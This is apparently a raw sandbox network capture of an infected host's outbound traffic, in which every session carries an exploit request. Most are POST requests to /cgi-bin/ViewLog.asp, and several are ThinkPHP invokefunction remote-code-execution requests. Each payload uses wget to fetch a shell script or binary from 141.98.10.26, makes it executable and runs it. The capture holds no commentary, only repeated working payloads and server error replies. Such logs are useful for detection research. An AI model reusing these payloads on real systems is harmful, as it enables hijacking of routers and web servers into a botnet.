Nov 22, 2023 08:37:53.363513947 CET	561	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:37:55.859118938 CET	817	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:00.466504097 CET	1327	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:09.681236982 CET	2439	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:28.622514009 CET	4724	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:05.481369972 CET	9217	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.23	54026	31.200.127.109	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:51.651679993 CET	421	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.23	43116	94.121.79.125	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:51.658577919 CET	422	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.23	38768	31.136.130.132	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:51.800216913 CET	424	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:37:52.371752024 CET	439	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:37:53.491543055 CET	572	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:37:55.859225035 CET	819	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:00.466506004 CET	1327	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:09.425209045 CET	2425	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:28.622524023 CET	4724	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:05.481357098 CET	9216	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.23	53320	31.43.30.38	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:51.872879028 CET	434	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:37:52.095370054 CET	437	IN	HTTP/1.1 404 Not Found Date: Wed, 22 Nov 2023 07:37:51 GMT Connection: Close

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.23	43820	94.121.181.0	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:51.875153065 CET	435	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.23	35598	95.161.196.170	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:53.143312931 CET	545	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:37:53.421196938 CET	561	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Date: Wed, 22 Nov 2023 07:37:54 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.23	43618	95.101.247.189	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:53.327357054 CET	558	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:37:53.507591009 CET	572	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:37:53 GMT Date: Wed, 22 Nov 2023 07:37:53 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 35 62 30 66 37 34 38 26 23 34 36 3b 31 37 30 30 36 33 38 36 37 33 26 23 34 36 3b 31 61 33 66 31 35 64 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.a5b0f748.1700638673.1a3f15d3</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.23	53398	95.100.224.246	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:53.331912041 CET	558	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:37:53.519680023 CET	573	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:37:53 GMT Date: Wed, 22 Nov 2023 07:37:53 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 37 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 30 36 33 38 36 37 33 26 23 34 36 3b 32 35 65 38 61 61 39 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.577e19b8.1700638673.25e8aa94</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.23	38088	95.100.227.33	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:53.336291075 CET	559	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:37:53.528388023 CET	574	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:37:53 GMT Date: Wed, 22 Nov 2023 07:37:53 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 61 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 30 36 33 38 36 37 33 26 23 34 36 3b 32 66 65 35 32 31 62 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.4a7e19b8.1700638673.2fe521bf</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.23	41616	95.216.96.250	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:53.338995934 CET	560	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:37:53.533642054 CET	575	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:37:53 GMT Server: Apache Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.23	36898	31.136.219.234	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:53.650243998 CET	636	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:37:56.882982016 CET	927	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:03.026211023 CET	1656	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:15.056407928 CET	3045	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
